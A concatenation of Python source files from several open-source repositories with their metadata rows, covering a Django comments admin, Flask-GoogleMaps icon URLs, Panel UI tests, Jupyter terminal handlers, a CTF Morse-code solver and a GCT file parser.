if isinstance(self.training, list):
for i in range(0, len(self.training)):
element = self.training[i]
if hasattr(element, 'to_alipay_dict'):
self.training[i] = element.to_alipay_dict()
if hasattr(self.training, 'to_alipay_dict'):
params['training'] = self.training.to_alipay_dict()
else:
params['training'] = self.training
if self.training_num:
if hasattr(self.training_num, 'to_alipay_dict'):
params['training_num'] = self.training_num.to_alipay_dict()
else:
params['training_num'] = self.training_num
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceEducateCreditbankStudyprofileModifyModel()
if 'cb_id' in d:
o.cb_id = d['cb_id']
if 'certificate_experience' in d:
o.certificate_experience = d['certificate_experience']
if 'certificate_num' in d:
o.certificate_num = d['certificate_num']
if 'channel' in d:
o.channel = d['channel']
if 'credit' in d:
o.credit = d['credit']
if 'credit_num' in d:
o.credit_num = d['credit_num']
if 'training' in d:
o.training = d['training']
if 'training_num' in d:
o.training_num = d['training_num']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
650393ba1ec57e60edfe5527dc1c5550b9b8df8a
|
6f8c004f00db188e9bce68b2e433e49fef4ad4e4
|
/django_comments/admin.py
|
cf3117bb98ec824ff928175529f10e0502b24095
|
[] |
permissive
|
django/django-contrib-comments
|
915ea548bb57cb50b98fecb1bbd6e5b0b399cd58
|
4ad4c701f2a17ca62f040e94d73c2eb08af320e9
|
refs/heads/master
| 2023-08-30T23:59:23.712723
| 2023-08-16T18:55:12
| 2023-08-22T12:03:11
| 8,710,168
| 564
| 218
|
BSD-3-Clause
| 2023-08-22T12:03:12
| 2013-03-11T18:27:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,639
|
py
|
admin.py
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.utils.translation import gettext_lazy as _, ngettext
from django_comments import get_model
from django_comments.views.moderation import perform_flag, perform_approve, perform_delete
class UsernameSearch:
"""The User object may not be auth.User, so we need to provide
a mechanism for issuing the equivalent of a .filter(user__username=...)
search in CommentAdmin.
"""
def __str__(self):
return 'user__%s' % get_user_model().USERNAME_FIELD
class CommentsAdmin(admin.ModelAdmin):
fieldsets = (
(
None,
{'fields': ('content_type', 'object_pk', 'site')}
),
(
_('Content'),
{'fields': ('user', 'user_name', 'user_email', 'user_url', 'comment')}
),
(
_('Metadata'),
{'fields': ('submit_date', 'ip_address', 'is_public', 'is_removed')}
),
)
list_display = ('name', 'content_type', 'object_pk', 'ip_address', 'submit_date', 'is_public', 'is_removed')
list_filter = ('submit_date', 'site', 'is_public', 'is_removed')
date_hierarchy = 'submit_date'
ordering = ('-submit_date',)
raw_id_fields = ('user',)
search_fields = ('comment', UsernameSearch(), 'user_name', 'user_email', 'user_url', 'ip_address')
actions = ["flag_comments", "approve_comments", "remove_comments"]
def get_actions(self, request):
actions = super().get_actions(request)
# Only superusers should be able to delete the comments from the DB.
if not request.user.is_superuser and 'delete_selected' in actions:
actions.pop('delete_selected')
if not request.user.has_perm('django_comments.can_moderate'):
if 'approve_comments' in actions:
actions.pop('approve_comments')
if 'remove_comments' in actions:
actions.pop('remove_comments')
return actions
def flag_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_flag,
lambda n: ngettext('flagged', 'flagged', n))
flag_comments.short_description = _("Flag selected comments")
def approve_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_approve,
lambda n: ngettext('approved', 'approved', n))
approve_comments.short_description = _("Approve selected comments")
def remove_comments(self, request, queryset):
self._bulk_flag(request, queryset, perform_delete,
lambda n: ngettext('removed', 'removed', n))
remove_comments.short_description = _("Remove selected comments")
def _bulk_flag(self, request, queryset, action, done_message):
"""
Flag, approve, or remove some comments from an admin action. Actually
calls the `action` argument to perform the heavy lifting.
"""
n_comments = 0
for comment in queryset:
action(request, comment)
n_comments += 1
msg = ngettext('%(count)s comment was successfully %(action)s.',
'%(count)s comments were successfully %(action)s.',
n_comments)
self.message_user(request, msg % {'count': n_comments, 'action': done_message(n_comments)})
# Only register the default admin if the model is the built-in comment model
# (this won't be true if there's a custom comment app).
Klass = get_model()
if Klass._meta.app_label == "django_comments":
admin.site.register(Klass, CommentsAdmin)
|
624fa78d72b86bada2b9d7fee142db0968b04656
|
8fbd7dcd16334ba7f0bc22268d7691d293fb74a6
|
/flask_googlemaps/icons.py
|
52d1cd5d4649949c9b413c6349d89add913e9dae
|
[
"MIT"
] |
permissive
|
flask-extensions/Flask-GoogleMaps
|
4629daa73aa86bd6f5e9086bb25a180d3c43ce2b
|
6d891695e8272416880180b1c048d3be38ad4742
|
refs/heads/master
| 2023-08-16T01:14:46.926121
| 2022-11-28T20:37:28
| 2022-11-28T20:37:28
| 14,603,772
| 195
| 84
|
MIT
| 2022-11-28T20:37:30
| 2013-11-21T23:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 6,365
|
py
|
icons.py
|
"""
The idea is to implement all icons from here:
http://kml4earth.appspot.com/icons.html#mapfiles
and
http://jg.org/mapping/icons.html
and
http://mabp.kiev.ua/2010/01/12/google-map-markers/
"""
__all__ = ["dots", "alpha", "shapes", "pushpin", "paddle"]
from typing import Optional, List
class Icon(object):
"""Dynamically return dot icon url"""
def __init__(self, base_url, options=None):
# type: (str, Optional[List[str]]) -> None
self.base_url = base_url
self.options = options
def __getattr__(self, item):
return self.base_url.format(item)
dots = Icon(
base_url="//maps.google.com/mapfiles/ms/icons/{0}-dot.png",
options=["blue", "yellow", "green", "red", "pink", "purple", "orange"],
) # type: Icon
alpha = Icon(
base_url="//www.google.com/mapfiles/marker{0}.png",
options=[
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"X",
"Z",
"W",
"Y",
],
) # type: Icon
shapes = Icon(
base_url="//maps.google.com/mapfiles/kml/shapes/{0}.png",
options=[
"airports",
"arrow",
"arrow-reverse",
"arts",
"bars",
"broken_link",
"bus",
"cabs",
"camera",
"campfire",
"campground",
"capital_big",
"capital_big_highlight",
"capital_small",
"capital_small_highlight",
"caution",
"church",
"coffee",
"convenience",
"cross-hairs",
"cross-hairs_highlight",
"cycling",
"dining",
"dollar",
"donut",
"earthquake",
"electronics",
"euro",
"falling_rocks",
"ferry",
"firedept",
"fishing",
"flag",
"forbidden",
"gas_stations",
"golf",
"grocery",
"heliport",
"highway",
"hiker",
"homegardenbusiness",
"horsebackriding",
"hospitals",
"info",
"info-i",
"info_circle",
"lodging",
"man",
"marina",
"mechanic",
"motorcycling",
"mountains",
"movies",
"open-diamond",
"parking_lot",
"parks",
"partly_cloudy",
"pharmacy_rx",
"phone",
"picnic",
"placemark_circle",
"placemark_circle_highlight",
"placemark_square",
"placemark_square_highlight",
"play",
"poi",
"police",
"polygon",
"post_office",
"rail",
"rainy",
"ranger_station",
"realestate",
"road_shield1",
"road_shield2",
"road_shield3",
"ruler",
"sailing",
"salon",
"schools",
"shaded_dot",
"shopping",
"ski",
"snack_bar",
"snowflake_simple",
"square",
"star",
"subway",
"sunny",
"swimming",
"target",
"terrain",
"thunderstorm",
"toilets",
"trail",
"tram",
"triangle",
"truck",
"volcano",
"water",
"webcam",
"wheel_chair_accessible",
"woman",
"yen",
],
) # type: Icon
pushpin = Icon(
base_url="//maps.google.com/mapfiles/kml/pushpin/{0}.png",
options=[
"blue-pushpin",
"grn-pushpin",
"ltblu-pushpin",
"pink-pushpin",
"purple-pushpin",
"red-pushpin",
"wht-pushpin",
"ylw-pushpin",
],
) # type: Icon
paddle = Icon(
base_url="//maps.google.com/mapfiles/kml/paddle/{0}.png",
options=[
"1-lv",
"2-lv",
"3-lv",
"4-lv",
"5-lv",
"6-lv",
"7-lv",
"8-lv",
"9-lv",
"10-lv",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"10",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"X",
"W",
"Y",
"Z",
"blu-blank-lv",
"blu-blank",
"blu-circle-lv",
"blu-circle",
"blu-diamond-lv",
"blu-diamond",
"blu-square-lv",
"blu-square",
"blu-stars-lv",
"blu-stars",
"grn-blank-lv",
"grn-blank",
"grn-circle-lv",
"grn-circle",
"grn-diamond-lv",
"grn-diamond",
"grn-square-lv",
"grn-square",
"grn-stars-lv",
"grn-stars",
"ltblu-blank",
"ltblu-circle",
"ltblu-diamond",
"ltblu-square",
"ltblu-stars",
"pink-blank",
"pink-circle",
"pink-diamond",
"pink-square",
"pink-stars",
"purple-blank",
"purple-circle-lv",
"purple-circle",
"purple-diamond-lv",
"purple-diamond",
"purple-square-lv",
"purple-square",
"purple-stars-lv",
"purple-stars",
"red-circle-lv",
"red-circle",
"red-diamond-lv",
"red-diamond",
"red-square-lv",
"red-square",
"red-stars-lv",
"red-stars",
"wht-blank",
"wht-blank-lv",
"wht-circle-lv",
"wht-circle",
"wht-diamond-lv",
"wht-diamond",
"wht-square-lv",
"wht-square",
"wht-stars-lv",
"wht-stars",
"ylw-blank",
"ylw-blank-lv",
"ylw-circle-lv",
"ylw-circle",
"ylw-diamond-lv",
"ylw-diamond",
"ylw-square-lv",
"ylw-square",
"ylw-stars-lv",
"ylw-stars",
"orange-blank",
"orange-circle",
"orange-diamond",
"orange-square",
"orange-stars",
"go-lv",
"go",
"pause-lv",
"pause",
"stop-lv",
"stop",
"route",
],
) # type: Icon
|
39cbd1287ceb781936bfb76d9c19551dfaab1792
|
ad1d46b4ec75ef1f00520ff246d0706c6bb7770e
|
/content/chapters/transform-strings/10.py
|
abc82de1f7338e66f6a82312d9fe32688dd3c23d
|
[] |
no_license
|
roberto-arista/PythonForDesigners
|
036f69bae73095b6f49254255fc473a8ab7ee7bb
|
1a781ea7c7ee21e9c64771ba3bf5634ad550692c
|
refs/heads/master
| 2022-02-24T15:28:04.167558
| 2021-09-07T10:37:01
| 2021-09-07T10:37:01
| 168,937,263
| 103
| 37
| null | 2022-02-11T02:24:01
| 2019-02-03T11:17:51
|
Python
|
UTF-8
|
Python
| false
| false
| 216
|
py
|
10.py
|
print(f"{'a':^10}")
print(f"{'bcd':^10}")
print(f"{'efghi':^10}")
print(f"{'jklmnop':^10}")
print(f"{'qrstu':^10}")
print(f"{'vwx':^10}")
print(f"{'y':^10}")
# a
# bcd
# efghi
# jklmnop
# qrstu
# vwx
# y
|
9c81acc4a2aef1e8a06226f621ed5b14adb8f370
|
f6f6d13ecabee843ad4b41aae301e1bad1a07bdb
|
/tests/CLI/run_one_test.py.in
|
47085f7a6c42c12e683f5e15445be23f93c32105
|
[
"Apache-2.0"
] |
permissive
|
p4lang/PI
|
ec6a912f77f3ed73516a844ea5ca9fdb74c0e774
|
6d0f3d6c08d595f65c7d96fd852d9e0c308a6f30
|
refs/heads/main
| 2023-08-30T02:44:12.127320
| 2023-08-21T16:45:07
| 2023-08-21T16:45:07
| 51,870,280
| 170
| 128
|
Apache-2.0
| 2023-09-11T09:52:09
| 2016-02-16T21:07:15
|
C++
|
UTF-8
|
Python
| false
| false
| 7,563
|
in
|
run_one_test.py.in
|
#!/usr/bin/env python3
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import sys
import subprocess
import os
import time
import random
import re
import io
import tempfile
sswitch_path = "@BM_SIMPLE_SWITCH@"
CLI_path = os.path.join("@abs_top_builddir@", "CLI", "pi_CLI_rpc")
rpc_server_path = os.path.join("@abs_top_builddir@", "bin", "pi_rpc_server")
valgrind_supp = os.path.join("@abs_srcdir@", "test.supp")
# Class written by Mihai Budiu, for Barefoot Networks, Inc.
class ConcurrentInteger(object):
# Generates exclusive integers in a range 0-max
# in a way which is safe across multiple processes.
# It uses a simple form of locking using folder names.
# This is necessary because this script may be invoked
# concurrently many times by make, and we need the many simulator instances
# to use different port numbers.
def __init__(self, folder, max):
self.folder = folder
self.max = max
def lockName(self, value):
return "lock_" + str(value)
def release(self, value):
os.rmdir(self.lockName(value))
def generate(self):
# try 10 times
for i in range(0, 10):
index = random.randint(0, self.max)
file = self.lockName(index)
try:
os.makedirs(file)
os.rmdir(file)
return index
except:
time.sleep(1)
continue
return None
def process_valgrind_output(stderr, name):
f_name = None
v = None
with tempfile.NamedTemporaryFile(delete=False, mode="w+") as f:
print("Valgrind output for", name, "written to", f.name)
f_name = f.name
while True:
L = stderr.readline()
if sys.version_info >= (3, 0):
# force string conversion for Python2 and Python3 compatibility
L = L.decode()
f.write(L)
if "ERROR SUMMARY" in L:
m = re.search("ERROR SUMMARY: ([0-9]*) errors "
"from ([0-9]*) contexts", L)
assert(m.lastindex == 2)
v = (int(m.group(1)) == 0) and (int(m.group(2)) == 0)
break
if v: # success, we can remove files
os.remove(f_name)
return v
def main():
def fail_msg(msg):
print(msg)
sys.exit(1)
if len(sys.argv) != 4:
fail_msg("Invalid number of arguments")
testdata_dir = sys.argv[1]
testname = sys.argv[2]
jsonname = sys.argv[3]
command_path = os.path.join(testdata_dir, testname + ".in")
output_path = os.path.join(testdata_dir, testname + ".out")
json_path = os.path.join(testdata_dir, jsonname)
concurrent = ConcurrentInteger(os.getcwd(), 1000)
rand = concurrent.generate()
if rand is None:
fail_msg("Error when generating random port number")
thrift_port = str(9090 + rand)
device_id = str(rand)
rpc_path = "/tmp/pi_rpc_{}.ipc".format(rand)
rpc_addr = "ipc://{}".format(rpc_path)
# start simple_switch
simple_switch_p = subprocess.Popen(
[sswitch_path, json_path, "--thrift-port", thrift_port,
"--device-id", device_id, "--", "--enable-swap"],
stdout=subprocess.PIPE)
bmv2_notifications_rpc_path = "/tmp/bmv2-{}-notifications.ipc".format(
device_id)
with_valgrind = (os.getenv("PI_TEST_WITH_VALGRIND") != None)
valgrind_with_options = ["valgrind"]
# third-party code shows memory leaks
# valgrind_with_options += ["--leak-check=full", "--show-reachable=yes"]
valgrind_with_options += ["--suppressions={}".format(valgrind_supp)]
# Valgrind output is sent to stderr, which we will analyze later
if with_valgrind:
rpc_server_cmd = ["libtool", "--mode=execute"] + valgrind_with_options
else:
rpc_server_cmd = []
rpc_server_cmd += [rpc_server_path]
rpc_server_p = subprocess.Popen(rpc_server_cmd + ["-a", rpc_addr],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def remove_rpc():
try:
os.remove(rpc_path)
except:
pass
try:
os.remove(bmv2_notifications_rpc_path)
except:
pass
def fail(msg):
rpc_server_p.terminate()
simple_switch_p.terminate()
remove_rpc()
fail_msg(msg)
time.sleep(1)
if with_valgrind:
cmd = ["libtool", "--mode=execute"] + valgrind_with_options
else:
cmd = []
cmd += [CLI_path, "-c", os.path.abspath(json_path), "-a", rpc_addr]
# use 8589934592 to test 64-bit device id support
input_ = "assign_device 8589934592 0 {} -- port={}\n".format(
os.path.abspath(json_path), thrift_port)
with open(command_path, "r") as f:
input_ += f.read()
out = None
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=testdata_dir)
if sys.version_info >= (3, 0):
# force string conversion for Python2 and Python3 compatibility
input_ = input_.encode()
out, stderr = p.communicate(input_)
if sys.version_info >= (3, 0):
# force string conversion for Python2 and Python3 compatibility
out = out.decode()
rc = p.returncode
if rc:
print(out)
print(stderr)
fail("CLI returned error code")
assert(out)
# print out
def parse_data(s, pattern):
# m = re.findall("{}.*\n(.*)\n(?={})".format(pattern, pattern), s)
# Note how the second \n is optional (\n?), this is to accomodate
# commands with an empty output
m = re.findall("{}[^\n]*\n(.*?)\n?(?={})".format(pattern, pattern), s,
re.DOTALL)
return m
out_parsed = parse_data(out, "PI CLI> ")
with open(output_path, "r") as f:
expected_parse = parse_data(f.read(), "\?\?\?\?")
if len(out_parsed) != len(expected_parse):
print(out_parsed)
print("****************")
fail("Mismatch between expected output and actual output")
for o, e in zip(out_parsed, expected_parse):
if o != e:
print(o)
print("****************")
print(e)
fail("Mismatch between expected output and actual output")
# terminate gives the process a chance to flush to the file
rpc_server_p.terminate()
simple_switch_p.terminate()
# apparently, there is no issue with me reading from the PIPE after
# terminated the process
if with_valgrind:
v1 = process_valgrind_output(io.BytesIO(stderr), "RPC CLI")
v2 = process_valgrind_output(rpc_server_p.stderr, "RPC server")
if (not v1) or (not v2):
fail_msg("Detected valgrind error(s)")
remove_rpc()
sys.exit(0)
if __name__ == '__main__':
main()
|
821325014006bb6fa140238819fb92fa7d7b674f
|
52245910f830dbfb2b1432ad2a967df7321ee6de
|
/panel/tests/ui/test_reactive.py
|
c0f4a79c4b23dbd536ebc46b656a12d4157e9e2e
|
[
"BSD-3-Clause"
] |
permissive
|
holoviz/panel
|
92c19f979353d456512abbce5a027dff6ddb3a5c
|
2c6e165e2bba96c0cb97947aa072d4429133cf7a
|
refs/heads/main
| 2023-08-17T11:28:06.581979
| 2023-08-17T11:23:09
| 2023-08-17T11:23:09
| 145,848,899
| 2,544
| 373
|
BSD-3-Clause
| 2023-09-14T17:13:31
| 2018-08-23T12:14:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,689
|
py
|
test_reactive.py
|
import time
import param
import pytest
try:
from playwright.sync_api import expect
pytestmark = pytest.mark.ui
except ImportError:
pytestmark = pytest.mark.skip('playwright not available')
from panel.io.server import serve
from panel.reactive import ReactiveHTML
class ReactiveComponent(ReactiveHTML):
count = param.Integer(default=0)
_template = """
<div id="reactive" class="reactive" onclick="${script('click')}"></div>
"""
_scripts = {
'render': 'data.count += 1; reactive.innerText = `${data.count}`;',
'click': 'data.count += 1; reactive.innerText = `${data.count}`;'
}
def test_reactive_html_click_js_event(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
page.locator(".reactive").click()
expect(page.locator(".reactive")).to_have_text('2')
time.sleep(0.2)
assert component.count == 2
def test_reactive_html_set_loading_no_rerender(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.loading = True
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.loading = False
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
def test_reactive_html_changing_css_classes_rerenders(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.5)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.css_classes = ['custom']
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.loading = True
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.css_classes = []
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
def test_reactive_html_set_background_no_rerender(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.styles = dict(background='red')
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.styles = dict(background='green')
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
|
5a686aefb3989f5a26272f9fd654f0eec97aa563
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/notebook/terminal/api_handlers.py
|
059cc9165710e576d14c3a41dc8e347f23f957b0
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
api_handlers.py
|
import json
from tornado import web, gen
from ..base.handlers import APIHandler
from ..utils import url_path_join
class TerminalRootHandler(APIHandler):
@web.authenticated
def get(self):
tm = self.terminal_manager
terms = [{'name': name} for name in tm.terminals]
self.finish(json.dumps(terms))
@web.authenticated
def post(self):
"""POST /terminals creates a new terminal and redirects to it"""
name, _ = self.terminal_manager.new_named_terminal()
self.finish(json.dumps({'name': name}))
class TerminalHandler(APIHandler):
SUPPORTED_METHODS = ('GET', 'DELETE')
@web.authenticated
def get(self, name):
tm = self.terminal_manager
if name in tm.terminals:
self.finish(json.dumps({'name': name}))
else:
raise web.HTTPError(404, "Terminal not found: %r" % name)
@web.authenticated
@gen.coroutine
def delete(self, name):
tm = self.terminal_manager
if name in tm.terminals:
yield tm.terminate(name, force=True)
self.set_status(204)
self.finish()
else:
raise web.HTTPError(404, "Terminal not found: %r" % name)
|
aabebadf8460aba72cb397fd8cb2bbe10e810389
|
3e8cf48007bbcb17be2f21bf3e1758953fff3123
|
/发布报告的策略/市场分析小工具/三个月波动率计算.py
|
ff314ce3c90a4d84e346157ae41473e5f8bcb314
|
[] |
no_license
|
08zhangyi/multi-factor-gm-wind-joinquant
|
e3b296340d3126f98662d9041d38724fca697ab4
|
c1d2b0cdfa2425bf3c8ac61548974d246687e450
|
refs/heads/master
| 2022-11-16T08:36:19.666321
| 2022-10-26T04:46:17
| 2022-10-26T04:46:17
| 138,122,559
| 179
| 97
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
三个月波动率计算.py
|
from WindPy import w
w.start()
CODE_LIST = ['510300.SH', '511380.SH']
START_DATE = '2022-02-13'
END_DATE = '2022-05-13'
data = w.wss(CODE_LIST, "stdevry",
"startDate="+START_DATE+";endDate="+END_DATE+";period=1;returnType=1").Data[0]
print(data)
print(data[0]/data[1])
|
70f8b8a244e97a275bf76c455a1be526087f1065
|
ed36064525bad62959d9ab739edeea477bf29c1c
|
/2016-04-15-plaid-ctf/misc_morset/doit.py
|
df586a3b36120197df31b438a175a1eb3ec0b997
|
[] |
no_license
|
p4-team/ctf
|
2dae496622c8403d7539b21f0e9a286e9889195a
|
8280caff137e42b26cb55f2c62411c7c512088de
|
refs/heads/master
| 2023-08-12T03:21:31.021612
| 2023-04-26T23:57:29
| 2023-04-26T23:57:29
| 42,933,477
| 1,899
| 366
| null | 2022-06-07T21:51:40
| 2015-09-22T12:53:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,874
|
py
|
doit.py
|
from pwn import *
import binascii
import hashlib
code = {'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.'
}
revcode={}
for c in code:
revcode[code[c]]=c
def morse_dec(msg):
res=""
for word in msg.strip().split():
res=res+revcode[word]
return res
def morse_enc(msg):
res=""
for c in msg:
res=res+code[c.upper()]+" "
return res.strip()
def decrypt(s):
h=hex(int(morse_dec(s), 36)).strip("L")[2:]
if len(h)%2==1:
h="0"+h
h=binascii.unhexlify(h)
return h
def base36encode(number):
if not isinstance(number, (int, long)):
raise TypeError('number must be an integer')
if number < 0:
raise ValueError('number must be positive')
alphabet, base36 = ['0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '']
while number:
number, i = divmod(number, 36)
base36 = alphabet[i] + base36
return base36 or alphabet[0]
def encrypt(s):
h=morse_enc(base36encode(int(binascii.hexlify(s), 16)))
return h
r=remote("morset.pwning.xxx", 11821)
context.log_level="DEBUG"
s=r.recvline()
h=decrypt(s)
print h
h=h.split("SHA256")[1][1:].split(")")[0]
print h
#r.sendline(morse_enc(hashlib.sha256(h).hexdigest()))
r.sendline(encrypt(hashlib.sha256(h).hexdigest()))
s=r.recvline()
print decrypt(s)
r.recvall()
|
21a17564d2c433c1a90682d9dc6329df5c8a59a7
|
b319086bffb2af7144e404ce244a14d262d01e6a
|
/cmapPy/pandasGEXpress/parse_gct.py
|
8cfcd0925a8739c021416f4c18691fcf9986e802
|
[
"BSD-3-Clause"
] |
permissive
|
cmap/cmapPy
|
18e5c563e0ae0f161366d1f56be36ae6568b39d8
|
d1652c3223e49e68e3a71634909342b4a6dbf361
|
refs/heads/master
| 2022-07-22T20:44:02.189031
| 2022-07-19T18:55:29
| 2022-07-19T18:55:29
| 86,500,068
| 107
| 82
|
BSD-3-Clause
| 2022-07-19T18:55:30
| 2017-03-28T19:40:02
|
Python
|
UTF-8
|
Python
| false
| false
| 14,171
|
py
|
parse_gct.py
|
""" Reads in a gct file as a gctoo object.
The main method is parse. parse_into_3_df creates the row
metadata, column metadata, and data dataframes, while the
assemble_multi_index_df method in GCToo.py assembles them.
1) Example GCT v1.3:
----- start of file ------
#1.3
96 36 9 15
---------------------------------------------------
|id| rhd | cid |
---------------------------------------------------
| | | |
|c | | |
|h | (blank) | col_metadata |
|d | | |
| | | |
---------------------------------------------------
| | | |
|r | | |
|i | row_metadata | data |
|d | | |
| | | |
---------------------------------------------------
----- end of file ------
Notes:
- line 1 of file ("#1.3") refers to the version number
- line 2 of file ("96 36 9 15") refers to the following:
-96 = number of data rows
-36 = number of data columns
-9 = number of row metadata fields (+1 for the 'id' column -- first column)
-15 = number of col metadata fields (+1 for the 'id' row -- first row)
- Once read into a DataFrame, col_metadata_df is stored as the transpose of how it looks in the gct file.
That is, col_metadata_df.shape = (num_cid, num_chd).
2) Example GCT v1.2
----- start of file ------
#1.2
96 36
-----------------------------------------------
|"NAME" |"Description"| cid |
-----------------------------------------------
| r | | |
| i | | |
| d |row_metadata | data |
| | | |
| | | |
-----------------------------------------------
----- end of file ------
Notes:
- line 1 of file ("#1.3") refers to the version number
- line 2 of file ("96 36 9 15") refers to the following:
-96 = number of data rows
-36 = number of data columns
"""
import logging
import pandas as pd
import numpy as np
import os.path
import gzip
import cmapPy.pandasGEXpress.GCToo as GCToo
import cmapPy.pandasGEXpress.subset_gctoo as sg
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
__author__ = "Lev Litichevskiy, Oana Enache"
__email__ = "lev@broadinstitute.org"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
# What to label the index and columns of the component dfs
row_index_name = "rid"
column_index_name = "cid"
row_header_name = "rhd"
column_header_name = "chd"
DEFAULT_DATA_TYPE = np.float32
def parse(file_path, convert_neg_666=True, rid=None, cid=None,
ridx=None, cidx=None, row_meta_only=False, col_meta_only=False, make_multiindex=False,
data_type=DEFAULT_DATA_TYPE):
"""
The main method.
Args:
- file_path (string): full path to gct(x) file you want to parse
- convert_neg_666 (bool): whether to convert -666 values to numpy.nan
(see Note below for more details). Default = False.
- rid (list of strings): list of row ids to specifically keep from gct. Default=None.
- cid (list of strings): list of col ids to specifically keep from gct. Default=None.
- ridx (list of integers): only read the rows corresponding to this
list of integer ids. Default=None.
- cidx (list of integers): only read the columns corresponding to this
list of integer ids. Default=None.
- row_meta_only (bool): Whether to load data + metadata (if False), or
just row metadata (if True) as pandas DataFrame
- col_meta_only (bool): Whether to load data + metadata (if False), or
just col metadata (if True) as pandas DataFrame
- make_multiindex (bool): whether to create a multi-index df combining
the 3 component dfs
- data_type (numpy datatype): type of data to try to convert strings in matrix into,
i.e. default is numpy float32
Returns:
- myGCToo (GCToo object): A GCToo instance containing content of
parsed gct file ** OR **
- row_metadata (pandas df) ** OR ** col_metadata (pandas df)
Note: why is convert_neg_666 even a thing?
In CMap--for somewhat obscure historical reasons--we use "-666" as our null value
for metadata. However (so that users can take full advantage of pandas' methods,
including those for filtering nan's etc) we provide the option of converting these
into numpy.nan values, the pandas default.
"""
assert sum([row_meta_only, col_meta_only]) <= 1, (
"row_meta_only and col_meta_only cannot both be requested.")
nan_values = [
"#N/A", "N/A", "NA", "#NA", "NULL", "NaN", "-NaN",
"nan", "-nan", "#N/A!", "na", "NA", "None", "#VALUE!"]
# Add "-666" to the list of NaN values
if convert_neg_666:
nan_values.append("-666")
# Verify that the gct path exists
if not os.path.exists(file_path):
err_msg = "The given path to the gct file cannot be found. gct_path: {}"
logger.error(err_msg.format(file_path))
raise Exception(err_msg.format(file_path))
logger.info("Reading GCT: {}".format(file_path))
# Read version and dimensions
(version, num_data_rows, num_data_cols,
num_row_metadata, num_col_metadata) = read_version_and_dims(file_path)
# Read in metadata and data
(row_metadata, col_metadata, data) = parse_into_3_df(
file_path, num_data_rows, num_data_cols,
num_row_metadata, num_col_metadata, nan_values, data_type)
# Create the gctoo object and assemble 3 component dataframes
# Not the most efficient if only metadata requested (i.e. creating the
# whole GCToo just to return the metadata df), but simplest
myGCToo = create_gctoo_obj(file_path, version, row_metadata, col_metadata,
data, make_multiindex)
# Subset if requested
if (rid is not None) or (ridx is not None) or (cid is not None) or (cidx is not None):
logger.info("Subsetting GCT... (note that there are no speed gains when subsetting GCTs)")
